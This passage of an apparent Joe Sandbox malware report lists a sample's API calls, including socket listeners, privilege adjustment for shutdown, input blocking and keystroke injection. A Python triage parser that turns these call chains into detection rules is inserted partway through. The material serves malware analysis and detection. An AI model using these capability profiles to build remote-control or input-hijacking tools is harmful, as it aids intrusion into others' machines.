                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: 66b9d5b19acdb7c684a7ba392f2800f5a90608bf3f23363995b399f639d14faf
                                                          • Instruction ID: 29f4c93ea4cfc2b3935044868e8d9303b0d5727cc26a479916d8777a837da66b
                                                          • Opcode Fuzzy Hash: 66b9d5b19acdb7c684a7ba392f2800f5a90608bf3f23363995b399f639d14faf
                                                          • Instruction Fuzzy Hash: 2F01D431770722EAF72866A49C8AFFAB25CAB047C0F200065F917DE0D2DE905C209560
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002C69C7
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C69D6
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 002C69F2
                                                          • listen.WSOCK32(00000000,00000005), ref: 002C6A01
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C6A1B
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 002C6A2F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: 32e49ac3837a0f17eae4ed37ae987504144cb7d5b9f3fb16477611d20a7a7d3b
                                                          • Instruction ID: de745d2218f3b7f12df5841586110af70c0702af11f742ec7f033adc66fbc266
                                                          • Opcode Fuzzy Hash: 32e49ac3837a0f17eae4ed37ae987504144cb7d5b9f3fb16477611d20a7a7d3b
                                                          • Instruction Fuzzy Hash: 1B21BD302102019FCB10EF64DC89F6EB7B9EF48724F148258E81AAB291CB70AC51CF90
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00251DD6
                                                          • GetSysColor.USER32(0000000F), ref: 00251E2A
                                                          • SetBkColor.GDI32(?,00000000), ref: 00251E3D
                                                            • Part of subcall function 0025166C: DefDlgProcW.USER32(?,00000020,?), ref: 002516B4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: 70f473f30a3c576c981ba81a0f9b5991dc9d0fe737b4b75df6dfc63fcf1bf689
                                                          • Instruction ID: 21c61d2275a26988c9b528dafd8fec3b2fceec70b3ac0c303bfd2125402fe3b4
                                                          • Opcode Fuzzy Hash: 70f473f30a3c576c981ba81a0f9b5991dc9d0fe737b4b75df6dfc63fcf1bf689
                                                          • Instruction Fuzzy Hash: D2A12578137406BEDA296E698C49FBB356DDB46303F24420AFC02D61D1CA709D36C67D
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002BC329
                                                          • _wcscmp.LIBCMT ref: 002BC359
                                                          • _wcscmp.LIBCMT ref: 002BC36E
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 002BC37F
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 002BC3AF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 2387731787-0
                                                          • Opcode ID: 717ba87892d30ffe31ad6fd7505c2bacd9b7bb0874713ffd22633baa93f36f1e
                                                          • Instruction ID: 142b557a151f96ff76369e80adeb4ccaea3a4d517171ccc0001c1a410bef5267
                                                          • Opcode Fuzzy Hash: 717ba87892d30ffe31ad6fd7505c2bacd9b7bb0874713ffd22633baa93f36f1e
                                                          • Instruction Fuzzy Hash: 9551BC356206028FC714DF68D4D0EAAB3E4EF49324F20825DE95ACB3A1CB70AD64CF91
                                                          APIs
                                                            • Part of subcall function 002C8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C84A0
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002C6E89
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C6EB2
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 002C6EEB
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C6EF8
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 002C6F0C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 99427753-0
                                                          • Opcode ID: a7c1cc7b99d49796d800da26cd36dce859ec833700852355a457e5745ad933fe
                                                          • Instruction ID: 0b4e9583cf2e0311875d801a9c243839738fa4b4185cd5654479f8d0a38c63fc
                                                          • Opcode Fuzzy Hash: a7c1cc7b99d49796d800da26cd36dce859ec833700852355a457e5745ad933fe
                                                          • Instruction Fuzzy Hash: 2341D275660210AFDB10BF649C8AF6EB3A89F08718F04855CFD06AB3C2DA709D558F95
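The socket/bind/listen chain and the UDP socket/bind chain above, and the LookupPrivilegeValueW/AdjustTokenPrivileges/ExitWindowsEx chain earlier in this listing, are the kind of API sequences an analyst turns into triage rules. The following is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: a small Python parser for the report's "APIs" lines, with the Winsock constant decoding for the first three socket() arguments (2/1/6 = AF_INET/SOCK_STREAM/IPPROTO_TCP, 2/2/0x11 = AF_INET/SOCK_DGRAM/IPPROTO_UDP) and three call-chain rules. The sample blocks are copied from this report; the rules, their names and the assumption that listing order reflects call order within a function are the example's own.

```python
import re
from typing import Dict, List, Optional, Tuple

# One "APIs" line of a Joe Sandbox function block, e.g.
#   • bind.WSOCK32(00000000,?,00000010), ref: 002C69F2
#   • Part of subcall function 002A9399: GetLastError.KERNEL32 ref: 002A941D
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Winsock constants for socket(af, type, protocol); decoding is the example's assumption.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def _arg(tok: str) -> Optional[int]:
    """Eight hex digits become an int; '?' and string literals such as *.* stay unknown."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def parse_api_block(block: str) -> List[Dict]:
    """Turn the lines of one 'APIs' listing into call records, in listing order."""
    calls = []
    for line in block.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers such as 'Memory Dump Source' are not calls
        raw = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [_arg(a) for a in raw.split(",")] if raw is not None else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),  # address of the sub-function, or None
        })
    return calls


def has_chain(calls: List[Dict], chain: Tuple[str, ...]) -> bool:
    """True if the API names occur in this order (not necessarily adjacent)."""
    it = iter(calls)
    return all(any(c["api"] == name for c in it) for name in chain)


def socket_kind(calls: List[Dict]) -> Optional[Tuple[str, str, str]]:
    """Decode (af, type, protocol) of the first socket() call, if any."""
    for c in calls:
        if c["api"] == "socket" and len(c["args"]) >= 3:
            af, typ, proto = c["args"][:3]
            return (AF.get(af, str(af)), SOCK.get(typ, str(typ)), PROTO.get(proto, str(proto)))
    return None


def analyse(block: str) -> List[str]:
    """Apply the call-chain rules to one function's API listing."""
    calls = parse_api_block(block)
    findings = []
    kind = socket_kind(calls)
    if kind and has_chain(calls, ("socket", "bind", "listen")):
        findings.append("listener: %s/%s/%s socket bound and listening" % kind)
    elif kind and kind[1] == "SOCK_DGRAM" and has_chain(calls, ("socket", "bind")):
        findings.append("udp_bind: %s/%s/%s socket bound to a local port" % kind)
    if has_chain(calls, ("LookupPrivilegeValueW", "AdjustTokenPrivileges", "ExitWindowsEx")):
        findings.append("shutdown: token privilege adjusted before ExitWindowsEx")
    if has_chain(calls, ("FindFirstFileW", "FindNextFileW", "FindClose")):
        findings.append("dir_walk: FindFirstFile/FindNextFile enumeration loop")
    return findings


# Sample input: the three function blocks quoted from this report's "APIs" listings.
TCP_BLOCK = """\
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002C69C7
• WSAGetLastError.WSOCK32(00000000), ref: 002C69D6
• bind.WSOCK32(00000000,?,00000010), ref: 002C69F2
• listen.WSOCK32(00000000,00000005), ref: 002C6A01
• WSAGetLastError.WSOCK32(00000000), ref: 002C6A1B
• closesocket.WSOCK32(00000000,00000000), ref: 002C6A2F
"""
UDP_BLOCK = """\
  • Part of subcall function 002C8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C84A0
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002C6E89
• bind.WSOCK32(00000000,?,00000010), ref: 002C6EEB
• closesocket.WSOCK32(00000000,00000000), ref: 002C6F0C
"""
SHUTDOWN_BLOCK = """\
  • Part of subcall function 002A9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A93E3
  • Part of subcall function 002A9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A9410
  • Part of subcall function 002A9399: GetLastError.KERNEL32 ref: 002A941D
• ExitWindowsEx.USER32(?,00000000), ref: 002B57B4
"""

if __name__ == "__main__":
    for name, block in (("tcp", TCP_BLOCK), ("udp", UDP_BLOCK), ("shutdown", SHUTDOWN_BLOCK)):
        print(name, analyse(block))
```

The listen() backlog of 5 and the bind() address length of 0x10 (sizeof(sockaddr_in)) are visible directly in the decoded arguments; the report does not show the port, which is built in the function and passed as "?", so a rule like this can only say that a local listener is created, not on which port.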
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: b74c4fb60fd95c9f158f9d6bbc9fe18f6f74bd2649cd3ba3c98c685c681bfccf
                                                          • Instruction ID: 7bce0a1f5603011d0a21f35b4aa48fcaa32a348b245474574cfe59959cb4828f
                                                          • Opcode Fuzzy Hash: b74c4fb60fd95c9f158f9d6bbc9fe18f6f74bd2649cd3ba3c98c685c681bfccf
                                                          • Instruction Fuzzy Hash: 1011E6313609329BE7111F669CC8B6EB7A8FF44721B00452AE805D7341CBB0AD528ED4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 0b842083a1c7dfe146e33ad6e807b01bedfecc5d670347de53d62c97bb053095
                                                          • Instruction ID: 36dd8ca35ec822de712931bb7c2053c2287472c5357b956ffd8424ccea2b123d
                                                          • Opcode Fuzzy Hash: 0b842083a1c7dfe146e33ad6e807b01bedfecc5d670347de53d62c97bb053095
                                                          • Instruction Fuzzy Hash: 47D01271C7410DEECF049A91D8D8DFDB77CEB04304F104052F906A2040D2B587A8AA26
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002C1ED6,00000000), ref: 002C2AAD
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002C2AE4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: b3d328b70e0bd2e316ac6f30a2260f06eb003859c20315312f7719ecb476d539
                                                          • Instruction ID: db3e014173260964e5955640a5b480a10e81f1be986d069f749b865b866cca6a
                                                          • Opcode Fuzzy Hash: b3d328b70e0bd2e316ac6f30a2260f06eb003859c20315312f7719ecb476d539
                                                          • Instruction Fuzzy Hash: 0741D37162060AFFEB20DE54CC85FBBB7BCEB40754F10411EF605A6141EEB1AE699A60
                                                          APIs
                                                            • Part of subcall function 00270FE6: std::exception::exception.LIBCMT ref: 0027101C
                                                            • Part of subcall function 00270FE6: __CxxThrowException@8.LIBCMT ref: 00271031
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A93E3
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A9410
                                                          • GetLastError.KERNEL32 ref: 002A941D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 4a9e7c028932bed76e1404607023489f43a83cdf372310d515f47e5a90796030
                                                          • Instruction ID: 0aa213b7b61558a985fd0c80ac4f67a028d521c2cc7236c7b0119d620d6655a3
                                                          • Opcode Fuzzy Hash: 4a9e7c028932bed76e1404607023489f43a83cdf372310d515f47e5a90796030
                                                          • Instruction Fuzzy Hash: 781191B1428205AFD728DF55ECC9D2BB7BCEB48710B20856EF45997640EB74AC91CB60
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002B4271
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002B42B2
                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002B42BD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 33631002-0
                                                          • Opcode ID: 0d848da39fb38e31e26647640f9d059b2477607498eab87511c62d43103b1a71
                                                          • Instruction ID: 469f5b899592f02f16fd8bc4e6fd3e9a722b157f6c5d0831d6b7928846fe0d97
                                                          • Opcode Fuzzy Hash: 0d848da39fb38e31e26647640f9d059b2477607498eab87511c62d43103b1a71
                                                          • Instruction Fuzzy Hash: 5D118271E01228BFDB108F95AC88BFFBBBCEB45B60F104155FD04EB280C6705A019BA1
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002B4F45
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002B4F5C
                                                          • FreeSid.ADVAPI32(?), ref: 002B4F6C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: c2f62a72fa8df024ff249e6defcf60d0215fdc71d4943b4121454a626eec0896
                                                          • Instruction ID: c71f0043831f2fe3156fae098d4ba25dfa5b181435e4964c60646b3563b440c7
                                                          • Opcode Fuzzy Hash: c2f62a72fa8df024ff249e6defcf60d0215fdc71d4943b4121454a626eec0896
                                                          • Instruction Fuzzy Hash: 6FF03775A5120DBFDB00DFE0ECC9AAEBBB8EB08211F0044A9A901E6581E6746A448B50
                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002B1B01
                                                          • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 002B1B14
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InputSendkeybd_event
                                                          • String ID:
                                                          • API String ID: 3536248340-0
                                                          • Opcode ID: 1321f59f002424c50b7de5eb13f5a49d4b1d314a1116f9e32462ce72cbe4586f
                                                          • Instruction ID: 581bed92328879c7822c71b2987863f891507ae83885723ff46850723a86b528
                                                          • Opcode Fuzzy Hash: 1321f59f002424c50b7de5eb13f5a49d4b1d314a1116f9e32462ce72cbe4586f
                                                          • Instruction Fuzzy Hash: 2AF0A93191024DABDB00CF90C849BFE7BB4FF04305F40800AF9459A292D3799622DF94
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,002C9B52,?,002E098C,?), ref: 002BA6DA
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,002C9B52,?,002E098C,?), ref: 002BA6EC
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: d467a33353d51146f75c064339bdca9bfc83b7de19e5440b59475f7b2cb956ab
                                                          • Instruction ID: d260bf3601996672885eaf61df44adfc5d2ad9a3c21bd6d4fe99472f52875eef
                                                          • Opcode Fuzzy Hash: d467a33353d51146f75c064339bdca9bfc83b7de19e5440b59475f7b2cb956ab
                                                          • Instruction Fuzzy Hash: B5F02E3541421DBBDB20AFA4CC8CFDA376CFF08351F004155B908D6180D6709950CFE1
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8F27), ref: 002A8DFE
                                                          • CloseHandle.KERNEL32(?,?,002A8F27), ref: 002A8E10
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: 418631cd8bffe61b3d123aa2a964b318e604a76a473536f5eb49edb09635c211
                                                          • Instruction ID: d455b098fdeae3b67bf111b3f10012b4a5f9021bdac71e8aff8e47c65c4eacae
                                                          • Opcode Fuzzy Hash: 418631cd8bffe61b3d123aa2a964b318e604a76a473536f5eb49edb09635c211
                                                          • Instruction Fuzzy Hash: 8AE04632020650EFE7222B64FC48E777BADEF00310B108829F89A84470CB72ACE0DB20
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00278F87,?,?,?,00000001), ref: 0027A38A
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0027A393
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 4ca98c2eacce197cf9dc423d6918789b1b84e2af18abd858ca7dacd8daa8b9ff
                                                          • Instruction ID: 4dd0cb0b17b82b7517cd47c4b3700da4cb3405084435bde55033c93d6a4dbad9
                                                          • Opcode Fuzzy Hash: 4ca98c2eacce197cf9dc423d6918789b1b84e2af18abd858ca7dacd8daa8b9ff
                                                          • Instruction Fuzzy Hash: 4EB092314A4248ABCA402B91FC8DB883F68EB44A62F804090FA0D48464CBA254928A91
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 002C45F0
